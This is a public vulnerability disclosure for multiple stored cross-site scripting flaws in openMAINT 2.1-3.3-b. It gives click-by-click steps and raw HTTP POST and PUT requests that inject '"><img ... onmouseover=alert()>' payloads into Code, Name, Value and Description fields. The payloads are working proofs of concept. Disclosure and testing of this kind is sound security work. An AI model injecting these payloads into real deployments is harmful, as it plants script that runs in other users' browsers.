openMAINT 2.1-3.3-b Cross Site Scripting

`# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting  
# Date: 13/03/2021  
# Exploit Author: Hosein Vita  
# Vendor Homepage: https://www.openmaint.org/  
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/  
# Version: 2.1-3.3  
# Tested on: Linux  
  
Summary:  
  
Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters.  
  
Proof of concepts :   
  
1-Login to you'r Dashboard As a low privilege user  
2-Click On Facilities and assets - Location - Sites   
3- +Add card Building  
4- Code and name parameters both are vulnerable   
  
  
POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json  
.....  
Cookie: ...  
  
  
{"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....}  
  
  
The Xss will trigger in that form, and also if you click on "Map" button , the xss will trigger there  
  
  
  
------------------------------------------------------------------------  
Another Xss :  
  
1-Like above in Facilities click on Locations and click on complex   
2-click + Add card Complex  
3-insert javascript payload to Code And Name  
  
  
POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json  
....  
Connection: close  
Referer:   
Cookie: ....  
  
{"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...}  
  
  
4-Save it  
5-Back to Sites and click on previous card  
6- in position section click on "Complex" drop down   
7- xss will trigger  
  
  
------------------------------------------------------------------------  
Another Xss:  
  
1-Like exmaples above go to Locations and click on Sites   
2-Add Card Building or click the one you created before  
3-in left menu click on "Relations"   
4-click "Add relations" and select one of the options   
5- Add Card and select one of the options  
6- insert javascript payload to code and name parameter   
  
POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json  
Connection: close  
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578  
  
{"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... }  
  
  
7- save it and close the form  
8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list   
9- xss payload will trigger  
  
------------------------------------------------------  
  
Another Xss:  
  
1- In "Navigation" Bar click on "Configurations"   
2- Click on parameter  
3- + Add card Parameter  
4- Insert javascript payload to Code and Value   
  
PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json  
  
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578  
  
{"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....}  
  
save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger  
  
  
-------------------------------------------------------  
  
Another Xss:  
  
1-Click Facilities and assets  
2-Locations  
3-Select one of cards   
4-Click "Add Card"  
5-in "Attachments" tab click "Add attachment" select "Document" or "image"  
6-insert javascript payload in "Code" and "Description"  
  
  
PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
CMDBuild-ActionId: class.card.attachments.open  
CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8  
Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543  
Content-Length: 1020  
Connection: close  
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578  
  
-----------------------------1049383330380851725139941543  
Content-Disposition: form-data; name="attachment"; filename="blob"  
Content-Type: application/json  
  
{"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...}  
-----------------------------1049383330380851725139941543--  
  
7-save it and xss will trigger  
  
`